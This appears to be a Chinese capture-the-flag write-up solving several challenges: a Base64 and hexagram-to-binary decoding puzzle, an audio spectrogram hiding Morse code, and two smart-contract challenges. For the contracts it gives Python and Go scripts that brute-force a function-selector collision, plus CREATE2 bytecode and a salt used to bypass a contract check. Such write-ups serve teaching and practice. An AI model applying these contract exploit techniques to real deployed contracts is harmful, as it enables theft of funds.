Q2hpbmVzZSB0cmFkaXRpb25hbCBjdWx0dXJlIGlzIGJyb2FkIGFuZCBwcm9mb3VuZCEgU28gSSBXYW50IEdpdmUgWW91IE15IEZsYWcgQnV0IFlvdSBOZWVkIERlY29kZSBJdC5FbmpveSBUaGUgRmxhZyEhOuW4iCDlhZEg5aSNIOaNnyDlt70g6ZyHIOaZiyDlp6Qg5aSn6L+HIOiuvCDlmazll5Eg6ZyHIOaBkiDoioIg6LGrIA== ``` base64decode  ``` Chinese traditional culture is broad and profound! So I Want Give You My Flag But You Need Decode It.Enjoy The Flag!!:师 兑 复 损 巽 震 晋 姤 大过 讼 噬嗑 震 恒 节 豫 ``` 后面的字符是天干地支的64卦 ``` 师 兑 复 损 巽 震 晋 姤 大过 讼 噬嗑 震 恒 节 豫 ``` 直接上转换脚本: ```python s='师兑复损巽震晋姤大过讼噬嗑震恒节豫' dic={'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111', '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'} li=[] k=0 for i in range(len(s)): if k ==1: k=0 continue try: li.append(dic[s[i]]) except: t='' t=t+s[i]+s[i+1] li.append(dic[t]) k=1 ss=''.join(li) print(ss) enc='' for i in range(0,len(ss),8): enc+=chr(eval('0b'+ss[i:i+8])) print(enc) #010000110110100000110001011011100100000101011111011110010111100101100100011100110010000100 #Ch1nA_yyds! ``` Flag:`SCTF{Ch1nA_yyds!}` ### August 10, 2021: 碰撞4字节函数签名，满足下面关系即可 ``` res1 = 'func' + s + '(address,uint256)' if(Web3.keccak(text=res1).hex()[:10] == '0x80e10aa5'): ``` 16线程版: ```python from web3 import Web3 from pwn import * import _thread NUMBER_OF_THREAD = 16 def bf(idx): i = 0 cnt = 0 while True: s=str(i) #print(s) res1 = 'f' + s + '(address,uint256)' tmp = Web3.keccak(text=res1).hex()[:10] if(tmp == '0x80e10aa5') or (tmp == '0xa6f9dae1'): print(res1) break i = NUMBER_OF_THREAD*cnt + idx cnt +=1 def exp(): try: for i in range(NUMBER_OF_THREAD): _thread.start_new_thread(bf, (i,)) except: print("Error: unable to start thread") while 1: pass if __name__ == "__main__": exp() ``` go16线程版： ```go package main import ( "fmt" "strconv" "strings" "github.com/ethereum/go-ethereum/crypto" ) func bf(idx uint64) { var NUMBER_OF_THREAD uint64 = 16 var i uint64 = 18446744073709551615 var cnt uint64 = 0 for true { tmp := "f" + strconv.FormatUint(i, 10) + "(address,uint256)" hash := crypto.Keccak256Hash([]byte(tmp)) //fmt.Println(i) if strings.ToLower(hash.Hex()[:10]) == strings.ToLower("0x80e10aa5") || strings.ToLower(hash.Hex()[:10]) == strings.ToLower("0xa6f9dae1") { fmt.Println(tmp) break } i -= (NUMBER_OF_THREAD*cnt + idx) cnt += 1 } } func main() { var i uint64 = 0 for ; i < 16; i++ { go bf(i) bf(i) //fmt.Println(i) } } ``` 跑出来结果f17228387697868061535(address,uint256) 直接调用CallForAirDropmintor即可   ### in_the_vaporwaves: 谷歌冲浪发现一篇帖子https://dev.to/k0p1/stacks-2020-ctf-voices-in-the-head-forensic-1bea 一模一样的操作用Sonic Visualiser(https://www.sonicvisualiser.org/)看频谱图  底下内容转为摩斯电码`.../-.-./-/..-./-.././.../.----/.-./...--/..--.-/-../.-./../...-/./.../..--.-/../-./-/-----/..--.-/...-/.-/.--./---/.-./.--/.--.-./...-/./...`解码得到`SCTFDES1R3_DRIVES_INT0_VAPORW@VES` ### Constructor?: 0x0000000000000000000000000000000000000002 特殊地址合约代码长度为0，但返回值长度不为0 然后就是考察create2计算方式，爆破一个合约，内容是设置sstore(0,1)即可，然后合约地址十进制小于uint(0x0001000000000000000000000000000000000000)即可，可以简单让其高两个字节为0x0000即可（爆破） 合约地址0x8996c1789098e00e752414e9d398a3207ba54095 我的外部账户地址0x88D3052D12527F1FbE3a6E1444EA72c4DdB396c2 a = 0x0000000000000000000000000000000000000002 messages = 0x6080604052348015600f57600080fd5b50600160005560058060226000396000f3fe6001600055 salt = 0x000000000000000000000000000000000000000000000000000000000000370d 然后调用registContract即可，最后调用payforflag